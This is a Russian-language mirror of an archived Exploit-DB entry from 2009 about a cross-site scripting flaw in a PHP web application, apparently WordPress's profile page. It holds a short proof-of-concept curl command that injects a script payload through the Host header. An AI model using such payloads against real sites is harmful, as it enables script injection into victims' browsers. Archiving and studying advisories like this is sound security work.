- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10090
- Проверка EDB
-
- Пройдено
- Автор
- JUAN GALIANA LARA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-11-10
Код:
An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.
The following proof of concept is available:
curl -H "Cookie: my cookies here" -H "Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html- Источник
- www.exploit-db.com
